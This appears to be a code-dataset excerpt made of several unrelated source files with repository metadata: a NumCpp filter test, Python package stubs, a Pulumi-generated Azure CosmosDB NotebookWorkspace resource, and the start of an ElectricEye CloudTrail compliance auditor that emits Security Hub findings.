        dataOutPy = filters.minimum_filter(data, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing percentileFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        percentile = np.random.randint(0, 101, [1,]).item()
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.percentileFilter(cArray, kernalSize, percentile, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.percentile_filter(data, percentile, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing rankFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        # rank ranges over the kernel's kernalSize**2 footprint elements
        rank = np.random.randint(0, kernalSize**2 - 1, [1,]).item()
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.rankFilter(cArray, kernalSize, rank, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.rank_filter(data, rank, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(dataOutC, dataOutPy):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))

        print(colored(f'Testing uniformFilter: mode = {mode}', 'cyan'))
        shape = np.random.randint(1000, 2000, [2,]).tolist()
        cShape = NumCpp.Shape(shape[0], shape[1])
        cArray = NumCpp.NdArray(cShape)
        data = np.random.randint(100, 1000, shape).astype(np.double)
        cArray.setArray(data)
        kernalSize = 0
        while kernalSize % 2 == 0:
            kernalSize = np.random.randint(5, 15)
        constantValue = np.random.randint(0, 5, [1,]).item()  # only actually needed for constant boundary condition
        dataOutC = NumCpp.uniformFilter(cArray, kernalSize, modes[mode], constantValue).getNumpyArray()
        dataOutPy = filters.uniform_filter(data, size=kernalSize, mode=mode, cval=constantValue)
        if np.array_equal(np.round(dataOutC, 8), np.round(dataOutPy, 8)):
            print(colored('\tPASS', 'green'))
        else:
            print(colored('\tFAIL', 'red'))
####################################################################################
# Script entry point: run the whole filter test suite.
# (Removed stale commented-out calls to test1D()/test2D(); run doTest() to
# execute both, or call the individual suites directly from a REPL.)
if __name__ == '__main__':
    doTest()
| 52.439024 | 160 | 0.599587 | 2,122 | 19,350 | 5.446748 | 0.061734 | 0.056757 | 0.103824 | 0.031839 | 0.894791 | 0.893407 | 0.875151 | 0.839678 | 0.806974 | 0.806974 | 0 | 0.037637 | 0.243411 | 19,350 | 368 | 161 | 52.581522 | 0.751844 | 0.05292 | 0 | 0.772861 | 0 | 0 | 0.073693 | 0.003068 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00885 | false | 0.056047 | 0.014749 | 0 | 0.023599 | 0.19174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
31b29b93dff0d92cd5a2776167eeb5817659d53a | 170 | py | Python | python/olm/__init__.py | aapierce0/OLMKit | b2b93d7a1f03a620c5ee87491076bf18764adeb4 | [
"Apache-2.0"
] | 1 | 2017-09-22T09:56:49.000Z | 2017-09-22T09:56:49.000Z | python/olm/__init__.py | aapierce0/OLMKit | b2b93d7a1f03a620c5ee87491076bf18764adeb4 | [
"Apache-2.0"
] | null | null | null | python/olm/__init__.py | aapierce0/OLMKit | b2b93d7a1f03a620c5ee87491076bf18764adeb4 | [
"Apache-2.0"
] | null | null | null | from .account import Account
from .session import Session
from .outbound_group_session import OutboundGroupSession
from .inbound_group_session import InboundGroupSession
| 34 | 56 | 0.882353 | 20 | 170 | 7.3 | 0.45 | 0.267123 | 0.246575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094118 | 170 | 4 | 57 | 42.5 | 0.948052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
31c9ce756fd9a94a5af34808fe4229a858ed5a5b | 159 | py | Python | stubs/3.2/traceback.py | TimSimpsonR/mypy | 5e6fd6335e0662b0477e1d678269f33e6f4194ba | [
"PSF-2.0"
] | 1 | 2019-06-27T11:34:27.000Z | 2019-06-27T11:34:27.000Z | stubs/3.2/traceback.py | silky/mypy | de6a8d3710df9f49109cb682f2092e4967bfb92c | [
"PSF-2.0"
] | null | null | null | stubs/3.2/traceback.py | silky/mypy | de6a8d3710df9f49109cb682f2092e4967bfb92c | [
"PSF-2.0"
] | null | null | null | # Stubs for traceback
import typing
# TODO signatures
def format_tb(traceback): pass
def print_ecx(limit=None, file=None, chain=True): pass
# TODO add more
| 15.9 | 54 | 0.761006 | 25 | 159 | 4.76 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 159 | 9 | 55 | 17.666667 | 0.881481 | 0.308176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0.666667 | false | 0.666667 | 0.333333 | 0 | 1 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
31ca64452947fcba271969326f023da684813f47 | 16,016 | py | Python | sdk/python/pulumi_azure/cosmosdb/notebook_workspace.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/cosmosdb/notebook_workspace.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/cosmosdb/notebook_workspace.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['NotebookWorkspaceArgs', 'NotebookWorkspace']
@pulumi.input_type
class NotebookWorkspaceArgs:
    """Typed bag of input arguments for constructing a `NotebookWorkspace`
    resource.  Generated by the Pulumi Terraform bridge — edit with care."""

    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a NotebookWorkspace resource.
        :param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
        :param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
        """
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if name is not None:
            pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
        """
        return pulumi.get(self, "account_name")

    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class _NotebookWorkspaceState:
    """State (output) properties used when looking up or filtering existing
    `NotebookWorkspace` resources.  All fields are optional here, unlike the
    args class.  Generated by the Pulumi Terraform bridge — edit with care."""

    def __init__(__self__, *,
                 account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 server_endpoint: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering NotebookWorkspace resources.
        :param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
        :param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
        :param pulumi.Input[str] server_endpoint: Specifies the endpoint of Notebook server.
        """
        if account_name is not None:
            pulumi.set(__self__, "account_name", account_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if server_endpoint is not None:
            pulumi.set(__self__, "server_endpoint", server_endpoint)

    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
        """
        return pulumi.get(self, "account_name")

    @account_name.setter
    def account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="serverEndpoint")
    def server_endpoint(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the endpoint of Notebook server.
        """
        return pulumi.get(self, "server_endpoint")

    @server_endpoint.setter
    def server_endpoint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "server_endpoint", value)
class NotebookWorkspace(pulumi.CustomResource):
@overload
# Overload: property-style construction via individual keyword arguments.
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             account_name: Optional[pulumi.Input[str]] = None,
             name: Optional[pulumi.Input[str]] = None,
             resource_group_name: Optional[pulumi.Input[str]] = None,
             __props__=None):
    """
    Manages an SQL Notebook Workspace.

    ## Example Usage

    ```python
    import pulumi
    import pulumi_azure as azure

    example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
    example_account = azure.cosmosdb.Account("exampleAccount",
        location=example_resource_group.location,
        resource_group_name=example_resource_group.name,
        offer_type="Standard",
        kind="GlobalDocumentDB",
        consistency_policy=azure.cosmosdb.AccountConsistencyPolicyArgs(
            consistency_level="BoundedStaleness",
        ),
        geo_locations=[azure.cosmosdb.AccountGeoLocationArgs(
            location=example_resource_group.location,
            failover_priority=0,
        )])
    example_notebook_workspace = azure.cosmosdb.NotebookWorkspace("exampleNotebookWorkspace",
        resource_group_name=example_account.resource_group_name,
        account_name=example_account.name)
    ```

    ## Import

    SQL Notebook Workspaces can be imported using the `resource id`, e.g.

    ```sh
     $ pulumi import azure:cosmosdb/notebookWorkspace:NotebookWorkspace example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/notebookWorkspaces/notebookWorkspace1
    ```

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
    :param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
    :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
    """
    ...
@overload
# Overload: construction from a pre-built NotebookWorkspaceArgs bag.
def __init__(__self__,
             resource_name: str,
             args: NotebookWorkspaceArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Manages an SQL Notebook Workspace.

    ## Example Usage

    ```python
    import pulumi
    import pulumi_azure as azure

    example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
    example_account = azure.cosmosdb.Account("exampleAccount",
        location=example_resource_group.location,
        resource_group_name=example_resource_group.name,
        offer_type="Standard",
        kind="GlobalDocumentDB",
        consistency_policy=azure.cosmosdb.AccountConsistencyPolicyArgs(
            consistency_level="BoundedStaleness",
        ),
        geo_locations=[azure.cosmosdb.AccountGeoLocationArgs(
            location=example_resource_group.location,
            failover_priority=0,
        )])
    example_notebook_workspace = azure.cosmosdb.NotebookWorkspace("exampleNotebookWorkspace",
        resource_group_name=example_account.resource_group_name,
        account_name=example_account.name)
    ```

    ## Import

    SQL Notebook Workspaces can be imported using the `resource id`, e.g.

    ```sh
     $ pulumi import azure:cosmosdb/notebookWorkspace:NotebookWorkspace example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/notebookWorkspaces/notebookWorkspace1
    ```

    :param str resource_name: The name of the resource.
    :param NotebookWorkspaceArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NotebookWorkspaceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both ``__init__`` overloads: validates the
        # options, assembles the property bag, and registers the resource with
        # the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # ``opts.id`` set means we are looking up an existing resource, in which
        # case ``__props__`` carries its state and no inputs may be supplied here.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = NotebookWorkspaceArgs.__new__(NotebookWorkspaceArgs)

            # account_name is required unless resolving by URN.
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["name"] = name
            # resource_group_name is required unless resolving by URN.
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            # Output-only property; populated by the provider after creation.
            __props__.__dict__["server_endpoint"] = None
        super(NotebookWorkspace, __self__).__init__(
            'azure:cosmosdb/notebookWorkspace:NotebookWorkspace',
            resource_name,
            __props__,
            opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_endpoint: Optional[pulumi.Input[str]] = None) -> 'NotebookWorkspace':
"""
Get an existing NotebookWorkspace resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] server_endpoint: Specifies the endpoint of Notebook server.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NotebookWorkspaceState.__new__(_NotebookWorkspaceState)
__props__.__dict__["account_name"] = account_name
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["server_endpoint"] = server_endpoint
return NotebookWorkspace(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "account_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serverEndpoint")
def server_endpoint(self) -> pulumi.Output[str]:
"""
Specifies the endpoint of Notebook server.
"""
return pulumi.get(self, "server_endpoint")
| 47.666667 | 252 | 0.675262 | 1,872 | 16,016 | 5.5625 | 0.104701 | 0.066167 | 0.06319 | 0.052819 | 0.829444 | 0.804475 | 0.794296 | 0.773072 | 0.768174 | 0.749064 | 0 | 0.006007 | 0.241259 | 16,016 | 335 | 253 | 47.808955 | 0.850889 | 0.453484 | 0 | 0.570552 | 1 | 0 | 0.111297 | 0.011824 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153374 | false | 0.006135 | 0.030675 | 0 | 0.276074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31eb79af90c112c2f02e5454ac4e573698470b24 | 32,303 | py | Python | eeauditor/auditors/aws/AWS_CloudTrail_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/AWS_CloudTrail_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/AWS_CloudTrail_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
# Registry through which ElectricEye discovers the checks declared below.
registry = CheckRegister()
# Shared boto3 CloudTrail client used by every check in this module.
cloudtrail = boto3.client("cloudtrail")
# loop through trails
def list_trails(cache):
    """Return the CloudTrail ``list_trails`` response, memoized in ``cache``."""
    trails = cache.get("list_trails")
    if not trails:
        # Cache miss (or falsy cached value): fetch and store the fresh response.
        trails = cloudtrail.list_trails()
        cache["list_trails"] = trails
    return trails
@registry.register_check("cloudtrail")
def cloudtrail_multi_region_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudTrail.1] CloudTrail trails should be multi-region"""
    # Memoized list_trails() response shared by every check in this module.
    trail = list_trails(cache=cache)
    myCloudTrails = trail["Trails"]
    for trails in myCloudTrails:
        trailArn = str(trails["TrailARN"])
        trailName = str(trails["Name"])
        # Shadow trails excluded so each trail is evaluated exactly once.
        response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        for details in response["trailList"]:
            multiRegionCheck = str(details["IsMultiRegionTrail"])
            if multiRegionCheck == "False":
                # Single-region trail: emit a FAILED (MEDIUM severity) ASFF finding.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-multi-region-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "MEDIUM"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.1] CloudTrail trails should be multi-region",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " is not a multi-region trail. Refer to the remediation instructions if this configuration is not intended",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should be multi-region refer to the Receiving CloudTrail Log Files from Multiple Regions section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/receive-cloudtrail-log-files-from-multiple-regions.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-3",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 CA-7",
                            "NIST SP 800-53 IR-4",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-8",
                            "NIST SP 800-53 SI-4",
                            "AICPA TSC CC7.2",
                            "ISO 27001:2013 A.12.4.1",
                            "ISO 27001:2013 A.16.1.7",
                        ],
                    },
                    "Workflow": {"Status": "NEW"},
                    "RecordState": "ACTIVE",
                }
                yield finding
            else:
                # Multi-region trail: emit a PASSED finding, resolved and archived.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-multi-region-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.1] CloudTrail trails should be multi-region",
                    "Description": "CloudTrail trail " + trailName + " is a multi-region trail.",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should be multi-region refer to the Receiving CloudTrail Log Files from Multiple Regions section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/receive-cloudtrail-log-files-from-multiple-regions.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-3",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 CA-7",
                            "NIST SP 800-53 IR-4",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-8",
                            "NIST SP 800-53 SI-4",
                            "AICPA TSC CC7.2",
                            "ISO 27001:2013 A.12.4.1",
                            "ISO 27001:2013 A.16.1.7",
                        ],
                    },
                    "Workflow": {"Status": "RESOLVED"},
                    "RecordState": "ARCHIVED",
                }
                yield finding
@registry.register_check("cloudtrail")
def cloudtrail_cloudwatch_logging_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[CloudTrail.2] CloudTrail trails should have CloudWatch logging configured"""
    # Memoized list_trails() response shared by every check in this module.
    trail = list_trails(cache=cache)
    myCloudTrails = trail["Trails"]
    for trails in myCloudTrails:
        trailArn = str(trails["TrailARN"])
        trailName = str(trails["Name"])
        # Shadow trails excluded so each trail is evaluated exactly once.
        response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
        iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
        for details in response["trailList"]:
            # "CloudWatchLogsLogGroupArn" is only present when CloudWatch Logs
            # delivery is configured, so key presence is the pass/fail signal.
            # A membership test replaces the previous fragile pattern of catching
            # a broad Exception and string-matching the KeyError message.
            if "CloudWatchLogsLogGroupArn" in details:
                # CloudWatch logging configured: PASSED finding, resolved/archived.
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": trailArn + "/cloudtrail-cloudwatch-logging-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": trailArn,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[CloudTrail.2] CloudTrail trails should have CloudWatch logging configured",
                    "Description": "CloudTrail trail "
                    + trailName
                    + " has CloudWatch Logging configured.",
                    "Remediation": {
                        "Recommendation": {
                            "Text": "If your trail should send logs to CloudWatch refer to the Monitoring CloudTrail Log Files with Amazon CloudWatch Logs section of the AWS CloudTrail User Guide",
                            "Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/monitor-cloudtrail-log-files-with-cloudwatch-logs.html",
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "Resources": [
                        {
                            "Type": "AwsCloudTrailTrail",
                            "Id": trailArn,
                            "Partition": awsPartition,
                            "Region": awsRegion,
                        }
                    ],
                    "Compliance": {
                        "Status": "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF DE.AE-3",
                            "NIST SP 800-53 AU-6",
                            "NIST SP 800-53 CA-7",
                            "NIST SP 800-53 IR-4",
                            "NIST SP 800-53 IR-5",
                            "NIST SP 800-53 IR-8",
                            "NIST SP 800-53 SI-4",
                            "AICPA TSC CC7.2",
                            "ISO 27001:2013 A.12.4.1",
                            "ISO 27001:2013 A.16.1.7",
                        ],
                    },
